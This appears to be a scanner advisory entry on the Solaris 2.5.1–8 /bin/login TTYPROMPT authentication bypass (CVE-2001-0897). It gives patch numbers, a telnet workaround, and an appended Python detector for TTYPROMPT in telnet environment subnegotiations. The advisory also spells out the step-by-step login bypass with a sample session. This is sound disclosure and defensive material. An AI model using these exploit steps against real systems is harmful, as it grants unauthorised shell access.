| Field | Value |
|---|---|
| VID | 14029 |
| Severity | 40 |
| Port | 23 |
| Protocol | TCP |
| Class | TELNET |
Detailed Description

Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. The vulnerability allows a remote attacker without valid credentials to gain local access as any user, including root if remote root logins are permitted. This vulnerability has already been reported to the BugTraq mailing list, and a patch has been released by Sun. However, a very simple exploit exists that does not require the attacker to compile any code. The exploit requires the attacker simply to define the environment variable TTYPROMPT to a 6 character string inside telnet. Once connected to the remote host, you must type the username, followed by 64 'c's, and a literal '\n'. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).

Example:

```text
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c (continue) c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin
```

Platforms Affected: Sun Solaris 2.5.1, Sun Solaris 2.6, Sun Solaris 7.0, Sun Solaris 8.0

References: http://www.iss.net/security_center/static/7284.php
Recommendation

Apply the appropriate patch for your system, as listed on the Sun SunSolve Security Patches web site, http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F41987

| Solaris release | SPARC patch | Intel patch |
|---|---|---|
| 2.5.1 | 106160-02 or later | 106161-02 or later |
| 2.6 | 105665-04 or later | 105666-04 or later |
| 7 | 112300-01 or later | 112301-01 or later |
| 8 | 111085-02 or later | 111086-02 or later |

Use the patchadd command to install the patch. A reboot is not necessary.

As a workaround, disable the telnet server through which /bin/login may be exploited remotely. To do this, comment out the associated entry in the file /etc/inetd.conf, then restart inetd.
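Until the patch is applied, the precondition of this attack is visible on the wire: the telnet client must export a TTYPROMPT variable through the ENVIRON (option 36) or NEW-ENVIRON (option 39) subnegotiation. The following parser is an added defensive example, not part of this advisory; it scans a captured client-to-server telnet byte stream for such subnegotiations and reports whether TTYPROMPT was defined. The option and code values follow RFC 1408 and RFC 1572, and the sample capture is constructed.

```python
# Added example (not from the advisory): flag telnet client traffic that exports
# a TTYPROMPT variable through the ENVIRON (36) / NEW-ENVIRON (39) option, the
# precondition of the /bin/login attack above. Encoding per RFC 1408/1572.
IAC, SB, SE, VAR, VALUE, ESC, USERVAR = 0xFF, 0xFA, 0xF0, 0, 1, 2, 3
ENVIRON_OPTIONS = {36, 39}

def _parse_var_list(data: bytes):
    """Decode 'VAR name VALUE value ...' into (name, value) pairs."""
    fields, cur, j = [], None, 0            # fields: [name, value] bytearrays
    while j < len(data):
        b = data[j]
        if b == ESC and cur is not None and j + 1 < len(data):
            j += 1                          # ESC: next byte is literal data
            cur.append(data[j])
        elif b in (VAR, USERVAR):           # a new variable name starts
            fields.append([bytearray(), bytearray()])
            cur = fields[-1][0]
        elif b == VALUE and fields:         # value of the current variable
            cur = fields[-1][1]
        elif cur is not None:
            cur.append(b)
        j += 1
    return [(n.decode("latin-1"), v.decode("latin-1")) for n, v in fields]

def telnet_environ_vars(stream: bytes):
    """Return every (name, value) pair carried in ENVIRON subnegotiations."""
    pairs, i, n = [], 0, len(stream)
    while i < n - 1:
        if stream[i] != IAC or stream[i + 1] != SB:
            i += 1
            continue
        body, j = bytearray(), i + 2
        while j < n:                        # read until IAC SE; IAC IAC is a data 0xFF
            if stream[j] == IAC and j + 1 < n and stream[j + 1] == SE:
                j += 2
                break
            if stream[j] == IAC and j + 1 < n and stream[j + 1] == IAC:
                j += 1
            body.append(stream[j])
            j += 1
        i = j
        if len(body) >= 2 and body[0] in ENVIRON_OPTIONS:   # body[1] = IS/SEND/INFO
            pairs.extend(_parse_var_list(bytes(body[2:])))
    return pairs

def ttyprompt_defined(stream: bytes) -> bool:
    return any(name == "TTYPROMPT" for name, _ in telnet_environ_vars(stream))

# Constructed capture: server IAC DO NEW-ENVIRON, then the client's IS answer.
SAMPLE = b"\xff\xfd\x27\xff\xfa\x27\x00\x03TTYPROMPT\x01abcdef\x00USER\x01bin\xff\xf0"
```

Running `ttyprompt_defined(SAMPLE)` on the constructed capture returns True, while a session that only exports USER returns False.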
| Related URL | CVE-2001-0897 (CVE) |
| Related URL | (SecurityFocus) |
| Related URL | (ISS) |